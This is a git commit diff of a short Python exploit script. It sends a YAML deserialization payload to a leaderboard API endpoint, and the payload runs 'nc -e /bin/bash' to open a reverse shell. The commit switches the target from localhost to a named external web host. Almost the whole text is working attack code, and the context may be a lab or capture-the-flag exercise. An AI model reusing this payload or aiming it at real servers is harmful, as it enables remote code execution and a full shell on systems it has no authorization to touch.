Add uncommited documents

This commit is contained in:
2025-12-14 19:52:49 +01:00
parent 1fd92f2492
commit a0d1be96b6
2 changed files with 3 additions and 2 deletions

View File

@@ -3,7 +3,8 @@ import requests
malicious_yaml = """
!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
"""
url = "http://127.0.0.1:8080/api/leaderboard"
#url = "http://127.0.0.1:8080/api/leaderboard"
url = "http://libremon.furtest.fr/api/leaderboard"
headers = {
"Content-Type": "text/yaml"
}